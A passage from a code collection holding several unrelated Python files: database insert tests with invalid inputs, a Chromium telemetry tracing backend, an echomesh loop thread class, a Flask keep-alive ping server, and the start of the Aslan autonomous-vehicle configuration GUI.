params=ut.gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
"""
target: test insert with invalid field name
method: insert with invalid field name
expected: raise exception
"""
tmp_entity = ut.update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
"""
target: test insert with invalid field value
method: update the int64 field to an invalid value, then insert
expected: raise exception
"""
tmp_entity = ut.update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, binary_collection, get_field_vectors_value):
"""
target: test insert with invalid scenario
method: insert with invalid field entity
expected: raise exception
"""
tmp_entity = copy.deepcopy(default_binary_entity)
src_vectors = tmp_entity[-1]["values"]
src_vectors[0] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
"""
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise exception
"""
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(binary_id_collection, default_binary_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
"""
target: test insert with invalid field type
method: insert with invalid field type
expected: raise exception
"""
field_type = get_field_type
tmp_entity = ut.update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entities_value(self, connect, binary_collection, get_field_vectors_value):
"""
target: test insert with invalid vector value
method: insert entities with an invalid value inside the vector field
expected: raise exception
"""
tmp_entities = copy.deepcopy(default_binary_entities)
src_vector = tmp_entities[-1]["values"]
src_vector[1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entities)
|
tracing_backend.py
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import cStringIO
import json
import logging
import socket
import threading
from telemetry.core import util
from telemetry.core.chrome import trace_result
from telemetry.core.chrome import websocket
from telemetry.core.timeline import trace_event_importer
class TracingUnsupportedException(Exception):
pass
class TraceResultImpl(object):
def __init__(self, tracing_data):
self._tracing_data = tracing_data
def Serialize(self, f):
f.write('{"traceEvents": [')
d = self._tracing_data
# Note: we're not using ','.join here because the strings that are in the
# tracing data are typically many megabytes in size. In the fast case, f is
# just a file, so by skipping the in memory step we keep our memory
# footprint low and avoid additional processing.
if d:
f.write(d[0])
for i in range(1, len(d)):
f.write(',')
f.write(d[i])
f.write(']}')
def AsTimelineModel(self):
f = cStringIO.StringIO()
self.Serialize(f)
return trace_event_importer.Import(
f.getvalue())
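# Illustrative sketch (not part of the original file): because Serialize streams
# each chunk directly to the target file object, a multi-gigabyte trace is never
# joined into one in-memory string. A hypothetical caller:
#
#   impl = TraceResultImpl(['{"ph": "B"}', '{"ph": "E"}'])
#   with open('trace.json', 'w') as out:
#       impl.Serialize(out)   # writes {"traceEvents": [...]}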
class TracingBackend(object):
def __init__(self, devtools_port):
debugger_url = 'ws://localhost:%i/devtools/browser' % devtools_port
self._socket = websocket.create_connection(debugger_url)
self._next_request_id = 0
self._cur_socket_timeout = 0
self._thread = None
self._tracing_data = []
def BeginTracing(self, custom_categories=None):
self._CheckNotificationSupported()
req = {'method': 'Tracing.start'}
if custom_categories:
req['params'] = {'categories': custom_categories}
self._SyncRequest(req)
# Tracing.start will send asynchronous notifications containing trace
# data, until Tracing.end is called.
self._thread = threading.Thread(target=self._TracingReader)
self._thread.start()
def EndTracing(self):
req = {'method': 'Tracing.end'}
self._SyncRequest(req)
self._thread.join()
self._thread = None
def GetTraceResultAndReset(self):
assert not self._thread
ret = trace_result.TraceResult(
TraceResultImpl(self._tracing_data))
self._tracing_data = []
return ret
def Close(self):
if self._socket:
self._socket.close()
self._socket = None
def _TracingReader(self):
while self._socket:
try:
data = self._socket.recv()
if not data:
break
res = json.loads(data)
logging.debug('got [%s]', data)
if 'Tracing.dataCollected' == res.get('method'):
value = res.get('params', {}).get('value')
self._tracing_data.append(value)
elif 'Tracing.tracingComplete' == res.get('method'):
break
except (socket.error, websocket.WebSocketException):
logging.warning('Timeout waiting for tracing response, unusual.')
def _SyncRequest(self, req, timeout=10):
self._SetTimeout(timeout)
req['id'] = self._next_request_id
self._next_request_id += 1
data = json.dumps(req)
logging.debug('will send [%s]', data)
self._socket.send(data)
def _SetTimeout(self, timeout):
if self._cur_socket_timeout != timeout:
self._socket.settimeout(timeout)
self._cur_socket_timeout = timeout
def _CheckNotificationSupported(self):
"""Ensures we're running against a compatible version of chrome."""
req = {'method': 'Tracing.hasCompleted'}
self._SyncRequest(req)
while True:
try:
data = self._socket.recv()
except (socket.error, websocket.WebSocketException):
raise util.TimeoutException(
'Timed out waiting for reply. This is unusual.')
logging.debug('got [%s]', data)
res = json.loads(data)
if res['id'] != req['id']:
logging.debug('Dropped reply: %s', json.dumps(res))
continue
if res.get('response'):
raise TracingUnsupportedException(
'Tracing not supported for this browser')
elif 'error' in res:
return
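# Illustrative usage sketch (an assumption about the intended call order, not
# part of the original file): the reader thread only runs between BeginTracing
# and EndTracing, and the collected data is handed over afterwards:
#
#   backend = TracingBackend(devtools_port=9222)
#   backend.BeginTracing(custom_categories='cc,gpu')
#   # ... exercise the browser ...
#   backend.EndTracing()                  # joins the reader thread
#   result = backend.GetTraceResultAndReset()
#   backend.Close()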
|
Loop.py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import threading
import time
from echomesh.element import Element
from echomesh.util import Log
LOGGER = Log.logger(__name__)
# TODO: these should be settings values.
DEFAULT_TIMEOUT = 1.0
class Loop(Element.Element):
def __init__(self, parent, description, interval=1, name='Element.Loop',
report_error_on_close=False, timeout=DEFAULT_TIMEOUT,
full_slave=True, pause_on_exception=True, max_error_count=2,
delay=0):
super(Loop, self).__init__(parent, description, full_slave=full_slave)
self.name = name or repr(self)
self.report_error_on_close = report_error_on_close
self.interval = interval
self.delay = delay
self.timeout = timeout
self.pause_on_exception = pause_on_exception
self.max_error_count = max_error_count
self.error_count = 0
self.time = 0
def next_time(self, t):
# TODO: is this right?
return t
def loop_target(self, t):
pass
def target(self):
while self.is_running:
try:
self.single_loop()
except Exception:
self.error_count += 1
if self.is_running:
if self.error_count < self.max_error_count:
LOGGER.error('Thread %s reports an error:', self.name)
if self.pause_on_exception and self.is_running:
try:
self.pause()
except Exception:
pass
elif self.report_error_on_close:
LOGGER.error(
'Thread %s reports an error on close:', self.name)
def run(self):
# Don't call super, because it starts things automatically
if not self.is_running:
self.is_running = True
self.first_time = True
self.start_time = time.time()
self.next_loop_time = self.next_time(time.time())
self.thread = threading.Thread(target=self.target)
self.thread.daemon = True
self.thread.start()
def single_loop(self):
if self.first_time:
self.first_time = False
if self.delay > 0:
time.sleep(self.delay)
self.time = time.time()
if self.time >= self.next_loop_time:
self.loop_target(self.time)
self.next_loop_time = self.next_time(self.next_loop_time)
if self.next_loop_time <= self.time:
self.next_loop_time = self.next_time(self.time)
if self.is_running:
sleep_time = min(self.timeout, self.next_loop_time - self.time)
if sleep_time > 0:
time.sleep(sleep_time)
else:
LOGGER.error(
'Sleeping for negative time %s', sleep_time, limit=10)
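# Minimal subclass sketch (illustrative, not part of the original file): a
# concrete loop overrides loop_target for the periodic work and next_time to
# schedule the following tick:
#
#   class Ticker(Loop):
#       def next_time(self, t):
#           return t + self.interval     # fire once per interval
#
#       def loop_target(self, t):
#           LOGGER.info('tick at %f', t)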
|
server_pings.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Ping"
def run():
app.run(host='0.0.0.0', port=8080)
def server_ping():
t = Thread(target=run)
t.start()
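# Usage sketch (illustrative, not part of the original file): call server_ping()
# once at startup; the Flask app then serves "Ping" on 0.0.0.0:8080 from a
# background thread so an external uptime monitor can keep the process alive:
#
#   if __name__ == '__main__':
#       server_ping()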
|
aslan_wizard.py
|
#! /usr/bin/env python
#
# Copyright 2020 Project Aslan
# Author: Efimia Panagiotaki <efimia@streetdrone.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import wx
import wx.lib.buttons
import wx.lib.agw.customtreectrl as CT
import gettext
import os
import datetime
import sys
import fcntl
import threading
import Queue
import time
import shlex
import signal
import subprocess
import psutil
import yaml
import aslan_gui
import rospy
import std_msgs.msg
from std_msgs.msg import Bool
from decimal import Decimal
from types import MethodType
from aslan_msgs.msg import ConfigNDT
from aslan_msgs.msg import ConfigVelocitySet
from aslan_msgs.msg import ConfigNDTMapping
from aslan_msgs.msg import ConfigNDTMappingOutput
from aslan_msgs.msg import ConfigVoxelGridFilter
from aslan_msgs.msg import ConfigRayGroundFilter
from aslan_msgs.msg import ConfigWaypointLoader
from aslan_msgs.msg import ConfigWaypointFollower
from aslan_msgs.msg import ConfigLaneRule
from aslan_msgs.msg import ConfigLaneSelect
from aslan_msgs.msg import ConfigTwistFilter
from aslan_msgs.msg import ConfigLaneStop
SCHED_OTHER = 0
SCHED_FIFO = 1
SCHED_RR = 2
class MyFrame(aslan_gui.MyFrame):
def __init__(self, *args, **kwds):
aslan_gui.MyFrame.__init__(self, *args, **kwds)
self.load_dic = self.load_yaml('param.yaml', def_ret={})
self.params = []
self.log_que_stdout = Queue.Queue()
self.log_que_stderr = Queue.Queue()
self.log_que = Queue.Queue()
self.log_que_show = Queue.Queue()
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.all_th_infs = []
self.all_tabs = []
self.all_cmd_dics = []
self.config_dic = {}
self.sensing_cmd = {}
self.all_procs = []
# ros
#
rospy.init_node('aslan_wizard', anonymous=True)
# rospy.Subscriber('aslan_wizard', std_msgs.msg.String, self.ROSCb)
# self.pub = rospy.Publisher('', std_msgs.msg.String, queue_size=10)
self.bitmap_logo.Destroy()
self.bitmap_logo = wx.StaticBitmap(self, wx.ID_ANY, wx.Bitmap(src_dir()+ 'Aslan_Autonomy.png', wx.BITMAP_TYPE_ANY))
self.bitmap_1.Destroy()
self.bitmap_1 = wx.StaticBitmap(self.tab_simulation, wx.ID_ANY,
wx.Bitmap(src_dir() + 'imgs/sd.jpg', wx.BITMAP_TYPE_ANY))
self.bitmap_2.Destroy()
self.bitmap_2 = wx.StaticBitmap(self.tab_simulation, wx.ID_ANY,
wx.Bitmap(src_dir() + 'imgs/park.jpg', wx.BITMAP_TYPE_ANY))
# Configuration tab (Vehicle, Vehicle Info, Vehicle Model, Sensors tree, TF)
tab = self.tab_configuration
self.all_tabs.append(tab)
self.drv_probe_cmd = {}
self.sensing_cmd = {}
self.all_cmd_dics.append(self.sensing_cmd)
dic = self.load_yaml('vehicle.yaml')
self.add_params(dic.get('params', []))
self.create_checkboxes(dic, self.panel_sensing, None, self.drv_probe_cmd, self.sensing_cmd,
self.OnSensingDriver)
dic1 = self.load_yaml('cameras.yaml')
self.add_params(dic1.get('params', []))
self.create_checkboxes(dic1, self.panel_sensing1, None, self.drv_probe_cmd, self.sensing_cmd,
self.OnSensingDriver)
dic2 = self.load_yaml('radar.yaml')
self.add_params(dic2.get('params', []))
self.create_checkboxes(dic2, self.panel_sensing2, None, self.drv_probe_cmd, self.sensing_cmd,
self.OnSensingDriver)
self.setup_buttons(dic.get('buttons', {}), self.sensing_cmd)
self.dlg_rosbag_record = MyDialogROSbagRecord(self, cmd_dic=self.sensing_cmd)
buttons_color_hdr_setup(self.dlg_rosbag_record)
# Perception tab (Map, TF, Filters clicks, Localization NDT Tree)
tab = self.tab_perception
self.all_tabs.append(tab)
parent = self.tree_ctrl_0.GetParent()
for i in range(2):
self.obj_get('tree_ctrl_' + str(i)).Destroy()
self.map_cmd = {}
self.all_cmd_dics.append(self.map_cmd)
self.map_dic = self.load_yaml('perception.yaml')
items = self.map_dic
self.add_params(self.map_dic.get('params', []))
self.setup_buttons(self.map_dic.get('buttons', {}), self.map_cmd)
self.tc_point_cloud = self.obj_to_varpanel_tc(self.button_pcd, 'pcd_file')
self.label_point_cloud_bar.Destroy()
self.label_point_cloud_bar = BarLabel(tab, ' Loading... ')
self.label_point_cloud_bar.Enable(False)
def hook1G(args):
for f in args.get('func')().split(','):
sz = os.path.getsize(f)
if sz > 1024 * 1024 * 1024:
wx.MessageBox("Over 1GB\n\n{}\n({:,})".format(f, sz), caption='Warning')
args = {'func': self.tc_point_cloud.GetValue}
hook_var = {'hook': hook1G, 'args': args, 'flags': ['every_time']}
obj = self.button_pcd
gdic_v = self.obj_to_gdic(obj, {}).get('pcd_file', {})
gdic_v['hook_var'] = hook_var
for i in range(2):
tree_ctrl = self.create_tree(parent, items['subs'][i], None, None, self.map_cmd)
tree_ctrl.ExpandAll()
tree_ctrl.SetBackgroundColour(wx.NullColour)
setattr(self, 'tree_ctrl_' + str(i), tree_ctrl)
self.Bind(CT.EVT_TREE_ITEM_CHECKED, self.OnTreeChecked)
# Planning tab (Waypoint maker (loader), lane planner (traffic_wp, lane_select), astar planner (obstacle avoid, vel set), wp follower (pp, twist f)
tab = self.tab_planning
self.all_tabs.append(tab)
self.planning_cmd = {}
self.all_cmd_dics.append(self.planning_cmd)
parent = self.tree_ctrl_5.GetParent()
self.obj_get('tree_ctrl_5').Destroy()
self.obj_get('tree_ctrl_6').Destroy()
self.obj_get('tree_ctrl_7').Destroy()
self.obj_get('tree_ctrl_8').Destroy()
items = self.load_yaml('planning.yaml')
self.add_params(items.get('params', []))
self.setup_buttons(items.get('buttons', {}), self.planning_cmd)
for i in range(4):
tree_ctrl = self.create_tree(parent, items['subs'][i], None, None, self.planning_cmd)
tree_ctrl.ExpandAll()
tree_ctrl.SetBackgroundColour(wx.NullColour)
setattr(self, 'tree_ctrl_' + str(i + 5), tree_ctrl)
self.Bind(CT.EVT_TREE_ITEM_CHECKED, self.OnTreeChecked)
# Controls tab ( vehicle interface , radio boxes, supervisor, disclaimer )
tab = self.tab_controls
self.all_tabs.append(tab)
self.controls_cmd = {}
self.all_cmd_dics.append(self.controls_cmd)
controls = self.load_yaml('controls.yaml')
self.add_params(controls.get('params', []))
self.setup_buttons(controls.get('buttons', {}), self.controls_cmd)
self.label_rosbag_play_bar.Destroy()
self.label_rosbag_play_bar = BarLabel(self.tab_tools, ' Playing... ')
self.label_rosbag_play_bar.Enable(False)
# Simulation tab
tab = self.tab_simulation
self.all_tabs.append(tab)
self.sim_cmd = {}
self.all_cmd_dics.append(self.sim_cmd)
sim = self.load_yaml('simulation.yaml')
self.add_params(sim.get('params', []))
self.setup_buttons(sim.get('buttons', {}), self.sim_cmd)
parent = self.tree_ctrl_joystick.GetParent()
self.obj_get('tree_ctrl_joystick').Destroy()
tree_ctrl1 = self.create_tree(parent, sim['subs'], None, None, self.sim_cmd)
tree_ctrl1.SetBackgroundColour(wx.NullColour)
setattr(self, 'tree_ctrl_joystick', tree_ctrl1)
self.Bind(CT.EVT_TREE_ITEM_CHECKED, self.OnTreeChecked)
# General
aslan_gui.MyFrame.__do_layout(self)
cond = lambda s: s.startswith('tab_')
self.tab_names = \
[self.name_get_cond(tab, cond=cond, def_ret='').replace('tab_', '', 1) for tab in self.all_tabs]
new_btn_grps = (lambda btn_names, tab_names=self.tab_names:
[[self.obj_get('button_{}_{}'.format(bn, tn)) for tn in tab_names] for bn in btn_names])
self.alias_grps = new_btn_grps(('rosbag', 'rviz', 'rqt'))
for grp in self.alias_grps:
wx.CallAfter(self.alias_sync, get_top(grp))
s = get_tooltip_obj(grp[0])
if s:
for obj in grp[1:]:
set_tooltip_str(obj, s)
self.stat_dic = {}
for k in ['pmap']:
self.stat_dic[k] = False
rospy.Subscriber('pmap_stat', std_msgs.msg.Bool, self.stat_callback, callback_args=k)
# Tools tab (Rosbag play stop pause, rostopic list + refresh, echo, info, rviz, nodes graph)
tab1 = self.tab_tools
self.all_tabs.append(tab1)
self.simulation_cmd = {}
self.all_cmd_dics.append(self.simulation_cmd)
dictools = self.load_yaml('tools.yaml')
self.add_params(dictools.get('params', []))
self.setup_buttons(dictools.get('buttons', {}), self.simulation_cmd)
self.topics_dic = self.load_yaml('topics.yaml')
self.topics_list = []
self.topic_echo_curr_topic = None
self.topics_echo_proc = None
self.topics_echo_thinf = None
self.topics_echo_que = Queue.Queue()
self.topics_echo_sum = 0
thinf = th_start(self.topics_echo_show_th)
self.all_th_infs.append(thinf)
self.refresh_topics_list()
# logout thread
interval = 0.01
thinf = th_start(self.logout_th, {'que': self.log_que_stdout, 'interval': interval})
self.all_th_infs.append(thinf)
thinf = th_start(self.logout_th, {'que': self.log_que_stderr, 'interval': interval})
self.all_th_infs.append(thinf)
thinf = th_start(self.logout_th, {'que': self.log_que, 'interval': interval})
self.all_th_infs.append(thinf)
# Thumbnail
bm = wx.Bitmap(src_dir() + 'Aslan_Icon.png')
icon = wx.EmptyIcon()
icon.CopyFromBitmap(bm)
self.SetIcon(icon)
def logout_th(self, que, interval, ev):
if que == self.log_que_stdout or que == self.log_que_stderr:
while not ev.wait(0):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
self.log_que.put(s)
if interval <= 0:
continue
else: # == self.log_que
f = None
while not ev.wait(0):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
print s.strip()
sys.stdout.flush()
s = cut_esc(s)
if f:
f.write(s)
f.flush()
if f:
f.close()
def stat_callback(self, msg, k):
self.stat_dic[k] = msg.data
if k == 'pmap':
v = self.stat_dic.get(k)
wx.CallAfter(self.label_point_cloud_bar.SetLabel, 'OK' if v else '')
def name_get_cond(self, obj, cond=(lambda s: True), def_ret=None):
return next((nm for nm in dir(self) if cond(nm) and getattr(self, nm) is obj), def_ret)
def __do_layout(self):
pass
def OnSetupVehicleInterface(self, event):
obj = self.button_vehicle_interface
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
self.update_func(pdic, gdic, prm)
#
# for Topics
#
def OnRefreshTopics(self, event):
self.refresh_topics_list()
def refresh_topics_list(self):
lst = subprocess.check_output(['rostopic', 'list']).strip().split('\n')
panel = self.panel_topics_list
szr = self.sizer_topics_list
for obj in self.topics_list:
szr.Remove(obj)
obj.Destroy()
self.topics_list = []
for topic in lst:
obj = wx.HyperlinkCtrl(panel, wx.ID_ANY, topic, '')
self.Bind(wx.EVT_HYPERLINK, self.OnTopicLink, obj)
szr.Add(obj, 0, wx.LEFT, 4)
fix_link_color(obj)
self.topics_list.append(obj)
szr.Layout()
panel.SetVirtualSize(szr.GetMinSize())
# info clear
lb = self.label_topics_info
lb.SetLabel('')
# echo clear
self.topics_proc_th_end()
# wait que clear
while self.topics_echo_que.qsize() > 0:
time.sleep(0.1)
tc = self.text_ctrl_topics_echo
tc.Enable(False)
wx.CallAfter(tc.Clear)
wx.CallAfter(tc.Enable, True)
self.topics_echo_sum = 0
self.topic_echo_curr_topic = None
def OnEcho(self, event):
if self.checkbox_topics_echo.GetValue() and self.topic_echo_curr_topic:
self.topics_proc_th_start(self.topic_echo_curr_topic)
else:
self.topics_proc_th_end()
def OnTopicLink(self, event):
obj = event.GetEventObject()
topic = obj.GetLabel()
self.topic_echo_curr_topic = topic
# info
info = subprocess.check_output(['rostopic', 'info', topic]).strip()
lb = self.label_topics_info
lb.SetLabel(info)
lb.GetParent().FitInside()
# echo
self.topics_proc_th_end()
if self.checkbox_topics_echo.GetValue():
self.topics_proc_th_start(topic)
def topics_proc_th_start(self, topic):
out = subprocess.PIPE
err = subprocess.STDOUT
self.topics_echo_proc = psutil.Popen(['rostopic', 'echo', topic], stdout=out, stderr=err)
self.topics_echo_thinf = th_start(self.topics_echo_th)
def topics_proc_th_end(self):
thinf = self.topics_echo_thinf
if thinf:
th_end(thinf)
self.topics_echo_thinf = None
proc = self.topics_echo_proc
if proc:
terminate_children(proc)
terminate(proc)
# proc.wait()
self.topics_echo_proc = None
def topics_echo_th(self, ev):
if not self.topics_echo_proc:
return
file = self.topics_echo_proc.stdout
fl = fcntl.fcntl(file.fileno(), fcntl.F_GETFL)
fcntl.fcntl(file.fileno(), fcntl.F_SETFL, fl | os.O_NONBLOCK)
while not ev.wait(0):
try:
s = file.read(1)
except:
continue
if not s:
break
if self.checkbox_topics_echo.GetValue():
self.topics_echo_que.put(s)
que_clear(self.topics_echo_que)
def topics_echo_show_th(self, ev):
que = self.topics_echo_que
interval = self.topics_dic.get('gui_update_interval_ms', 100) * 0.001
chars_limit = self.topics_dic.get('gui_chars_limit', 10000)
tc = self.text_ctrl_topics_echo
while not ev.wait(interval):
qsz = que.qsize()
if qsz <= 0:
continue
if qsz > chars_limit:
over = qsz - chars_limit
for i in range(over):
try:
que.get(timeout=1)
except Queue.Empty:
break
qsz = chars_limit
arr = []
for i in range(qsz):
try:
s = que.get(timeout=1)
except Queue.Empty:
s = ''
arr.append(s)
s = ''.join(arr)
self.topics_echo_sum += len(s)
rm_chars = 0
if self.topics_echo_sum > chars_limit:
rm_chars = self.topics_echo_sum - chars_limit
self.topics_echo_sum = chars_limit
if self.checkbox_topics_echo.GetValue():
wx.CallAfter(append_tc_limit, tc, s, rm_chars)
# Configuration Tab
def OnSensingDriver(self, event):
self.OnChecked_obj(event.GetEventObject())
def OnROSbagRecord(self, event):
self.dlg_rosbag_record.show()
obj = event.GetEventObject()
set_val(obj, False)
# Infos
def OnInfoVM(self, event):
message = "The Visualization button automatically unzips the .stl model of the vehicle of your choice and " \
"launches RVIZ.\n\n TIP: Try increasing the alpha parameter on RVIZ. \n\n " \
"For more info, visit: vehicle_configuration"
self.dialog_info(message)
def OnInfoSensors(self, event):
message = "Select the Sensors Setup for your vehicle.\n\nThe camera drivers require additional packages " \
"to be installed, as described here: sensing/drivers/camera/README.md\n\n " \
"The UMRR Radar Driver, requires further configuration and interfacing, visit: sensing/drivers/radar/umrr_driver"
self.dialog_info(message)
def OnInfoTF1(self, event):
message = "TF maintains the relationship between coordinate frames in a tree structure and lets the user " \
"transform points etc between any two coordinate frames.\n\nMeasure the distance between your " \
"localizer (lidar) sensor and the baselink of your vehicle (center of rear axis).\n\nFor " \
"more info, visit: http://wiki.ros.org/tf"
self.dialog_info(message)
def OnInfoPCD(self, event):
message = "The package pcd_loader is loading a point cloud map. Choose the .pcd map you want to" \
" load, to update the launch file argument 'pcd_file'.\n\nFor more info, visit: mapping/pcd_loader"
self.dialog_info(message)
def OnInfoTF2(self, event):
message = "The package map_tf_generator is applying a transformation from the map frame to the world frame. It requires " \
"the point cloud map to be loaded.\n\nTIP: Wait for the pcd_loader to load your map fully and then launch this package.\n\n" \
"For more info, visit: mapping/map_tf_generator"
self.dialog_info(message)
def OnInfoFilters(self, event):
message = "These packages are filtering the output point cloud from the lidar or the radar sensor.\n\n" \
"Voxel Grid Filter is downsampling the point cloud generated using VoxelGrid filtering, " \
"for more info visit: http://pointclouds.org/documentation/tutorials/voxel_grid.php \n\n" \
"Ray Ground Filter is performing ground removal by masking the point cloud generated. Adapt the parameters based on the position of your sensors" \
"in the car\n\n" \
"TIP: From the config dialogs, you can select the point cloud topic you would like to filter.\n\n" \
"For more info, visit: src/sensing/filters "
self.dialog_info(message)
def OnInfoNDT(self, event):
message = "NDT Mapping is extracting the 3D map from a recorded lidar scan of an area.\n" \
"NDT Matching is responsible for localizing the vehicle in the pre recorded .pcd map by using the " \
"Normal Distributions Transform technique.\n" \
"NDT Matching Monitor is performing a health monitoring and reinitialization for ndt_matching.\n\n" \
"For more info, visit: src/localization/packages/lidar_localizer\n\n" \
"For more info on NDT, visit: https://www.streetdrone.com/post/hello-world-localisation-ndt "
self.dialog_info(message)
def OnInfoRoute1(self, event):
message = "The Waypoints Loader is responsible for loading the path waypoints from a csv file.\n" \
"The Waypoints Saver is responsible for generating waypoints by recreating the path the vehicle followed while mapping.\n\n" \
"TIP1: To generate waypoints you need to replay a rosbag, " \
"load the pcd map generated from that rosbag, localize in the map " \
"and then start extracting the path.\n\n " \
"TIP2: To visualize the output on rviz, add the topic MarkerArray\n\n" \
"For more info, visit: src/planning/motion/waypoint_maker "
self.dialog_info(message)
def OnInfoRoute2(self, event):
message = "Lane Selection is launching the traffic_waypoints and the lane_select nodes. It's responsible for" \
" drawing lanes between the waypoints for the vehicle to follow, by finding the closest waypoint to the vehicle's current position.\n\n" \
"For more info, visit: src/planning/mission/lane_planner"
self.dialog_info(message)
def OnInfoTraj1(self, event):
message = "This package is based on the A* search algorithm for path planning. It is responsible for " \
"finding the optimal(shortest) path for the vehicle to follow in order to reach the next target waypoint.\n\n" \
"Obstacle Search: This is responsible for detecting obstacles within a specific (avoidance) distance and updating the path of the car.\n" \
"Obstacle Sim: This can be used to simulate obstacles on rviz. It allows the user to draw obstacles using the 2d Nav Goal tool.\n" \
"Velocity Request: Based on the distance of the vehicle and the obstacle in it's path, this node is responsible for accelerating, decelerating and stopping the vehicle.\n\n" \
"For more info, visit: src/planning/motion/astar_planner "
self.dialog_info(message)
def OnInfoTraj2(self, event):
message = "Pure pursuit: This is responsible for calculating the twist command for controlling the vehicle, by " \
"fitting a curve between the vehicle and the next target waypoint, " \
"based on the lookahead distance.\n" \
"Low Pass filtering: This is responsible for filtering the twist_raw command by applying a low pass filter.\n\n" \
"For more info, visit: src/planning/motion/waypoint_follower"
self.dialog_info(message)
def OnInfoSup(self, event):
message = "High level supervisor node, monitoring the health of the system and publishing diagnostic messages for each package.\n\n" \
"For more info, visit: src/supervisor/check_message_alive"
self.dialog_info(message)
def OnInfoVI(self, event):
message = "The StreetDrone Vehicle Interface is the bridge between ROS and the StreetDrone embedded system (XCU) CAN input. " \
"Control loop feedback mechanisms are also implemented in the interface for vehicle speed and steer control.\n\n" \
"TIP: If you are using PEAK_USB, you need to click on Enable SocketCAN before launching the node.\n\n" \
"For more info, visit: src/vehicle_interface"
self.dialog_info(message)
def OnInfoSim(self, event):
message = "Gazebo simulation packages for the StreetDrone Twizy vehicle. Choose the world you would like to use from the dropdown menu." \
" Also select whether you would like to launch rviz alongside, with a default configuration.\n\n" \
"For more info, visit: vehicle_simulation/gazebo/sd_twizy_model"
self.dialog_info(message)
def OnInfoControl(self, event):
message = "The simulation can be controlled by the /sd_control topic, published by:\n " \
"1. Launching the StreetDrone Vehicle Interface, when the sd_simulation_mode param flag is set to true.\n" \
"2. Launching the Joystick controller. You can map specific buttons for your joystick using the parameters on config, visit http://wiki.ros.org/joy\n" \
"3. Launching the Keyboard controller node. Follow the instructions on the pop up terminal window.\n\n" \
"For more info, visit: vehicle_simulation/gazebo/sd_twizy_model"
self.dialog_info(message)
def dialog_info(self, message):
dialog = wx.MessageDialog(self.notebook_1, message, caption=wx.MessageBoxCaptionStr,
style=wx.OK | wx.CENTRE, pos=wx.DefaultPosition)
dialog.ShowModal()
dialog.Destroy()
def create_checkboxes(self, dic, panel, sizer, probe_dic, run_dic, bind_handler):
# if 'name' not in dic:
# return
obj = None
bdr_flg = wx.ALL
if 'subs' in dic:
lst = []
for d in dic['subs']:
self.create_checkboxes(d, panel, lst, probe_dic, run_dic, bind_handler)
if dic['name']:
obj = static_box_sizer(panel, dic.get('name'))
set_tooltip(obj.GetStaticBox(), dic)
else:
obj = wx.BoxSizer(wx.VERTICAL)
for (o, flg) in lst:
obj.Add(o, 0, wx.EXPAND | flg, 0)
else:
obj = wx.CheckBox(panel, wx.ID_ANY, dic['name'])
set_tooltip(obj, dic)
self.Bind(wx.EVT_CHECKBOX, bind_handler, obj)
bdr_flg = wx.LEFT | wx.RIGHT
if 'probe' in dic:
probe_dic[obj] = (dic['probe'], None)
if 'run' in dic:
run_dic[obj] = (dic['run'], None)
else:
gdic = self.gdic_get_1st(dic)
self.add_cfg_info(obj, obj, dic.get('name'), None, gdic, False, None)
if sizer is not None:
sizer.append((obj, bdr_flg))
else:
panel.SetSizer(obj)
def alias_grp_top_obj(self, obj):
return get_top(self.alias_grp_get(obj), obj)
def alias_grp_get(self, obj):
return next((grp for grp in self.alias_grps if obj in grp), [])
def name_get(self, obj):
return next((nm for nm in dir(self) if getattr(self, nm) is obj), None)
def is_toggle_button(self, obj):
return self.name_get(obj).split('_')[0] == 'button' and getattr(obj, 'GetValue', None)
def alias_sync(self, obj, v=None):
en = None
if getattr(obj, 'IsEnabled', None):
(key, en) = enables_get_last(obj)
if not key:
en = obj.IsEnabled()
grp = self.alias_grp_get(obj)
if getattr(obj, 'GetValue', None):
v = obj.GetValue()
for o in grp:
if o is obj:
continue
if en is not None and o.IsEnabled() != en and not self.is_toggle_button(o):
# if key:
# enable_set(o, key, en)
# else:
o.Enable(en)
if v is not None and getattr(o, 'SetValue', None):
set_val(o, v)
if getattr(o, 'SetInsertionPointEnd', None):
